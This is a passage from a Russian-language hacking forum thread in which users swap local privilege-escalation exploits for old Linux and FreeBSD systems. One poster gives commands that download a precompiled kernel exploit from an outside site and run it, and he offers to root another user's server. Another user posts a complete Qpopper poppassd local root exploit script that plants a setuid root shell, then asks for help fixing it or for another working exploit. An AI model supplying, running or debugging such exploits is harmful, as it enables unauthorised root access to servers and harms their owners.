HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #161  
Старый 26.02.2011, 02:48
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

 
Ответить с цитированием

  #162  
Старый 27.02.2011, 00:22
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Mr.Br0wn  
Mr.Br0wn said:
2.4.21 ---->
http://about-security.ws/xploits/ptrace.zip
,
http://about-security.ws/xploits/ptrace-kmod.zip
,
http://about-security.ws/xploits/brk.zip
или
http://about-security.ws/xploits/brk2.zip
пробуй, если что, пиши в ПМ помогу с рутом.
Ничего из этого не помогло((

пишет "Permission denied"
 
Ответить с цитированием

  #163  
Старый 27.02.2011, 00:30
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Напиши свой контакт в пм. Рутну тебе сервак
 
Ответить с цитированием

  #164  
Старый 27.02.2011, 00:31
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
пишет "Permission denied"
chmod +x
 
Ответить с цитированием

  #165  
Старый 27.02.2011, 00:56
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

Linux sendpage3 exploit, пишет mmap: Permission denied, значит уязвимость уже нет?

System: Linux **** 2.6.18-164.11.1.el5.centos.plus #1 SMP Wed Jan 20 18:49:35 EST 2010
 
Ответить с цитированием

  #166  
Старый 27.02.2011, 01:04
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Получается нет. Прав не хватает.
 
Ответить с цитированием

  #167  
Старый 27.02.2011, 01:30
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Цитата:
Сообщение от rootmd  
rootmd said:
Linux sendpage3 exploit, пишет mmap: Permission denied, значит уязвимость уже нет?
System: Linux **** 2.6.18-164.11.1.el5.centos.plus #1 SMP Wed Jan 20 18:49:35 EST 2010
пробуй:

wget http://about-security.ws/xploits/2.6.18-164.zip

unzip 2.6.18-164.zip

chmod 777 2.6.18-164

./2.6.18-164


P.s. сплойтик уже скомпилирован)
 
Ответить с цитированием

  #168  
Старый 27.02.2011, 15:34
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

mmap: Operation not permitted
 
Ответить с цитированием

  #169  
Старый 27.02.2011, 21:15
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

Значит ядро пропатченное.
 
Ответить с цитированием

  #170  
Старый 28.02.2011, 07:50
Mr.Br0wn
Новичок
Регистрация: 26.10.2009
Сообщений: 17
Провел на форуме:
124258

Репутация: 27
По умолчанию

при использовании следующего сплойта:

Код:
Code:
#!/bin/sh
###########################################################################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
# tested on FreeBSD 5.4-RELEASE           ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -f /etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat > program.c 
#include 
#include 
#include 

void _init()
{
 if (!geteuid()) {
 remove("/etc/libmap.conf");
 execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -t /etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -f /tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo "Sorry, exploit failed."
fi
вываливает следующая ошибка:

sh fuck.sh

: not found

: not found

FreeBSD Qpopper poppassd latest version local r00t exploit by kcope

umask: Illegal number: 0000

fuck.sh: 47: Syntax error: end of file unexpected (expecting "then")


В чём может быть ошибка? подскажите пожалуйста.

или дайте рабочий сплойт

----

Понял суть проблемы, не установлен: poppassd

есть ли у кого сплойты под 5.4? или можно ещё как-то повысить права?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ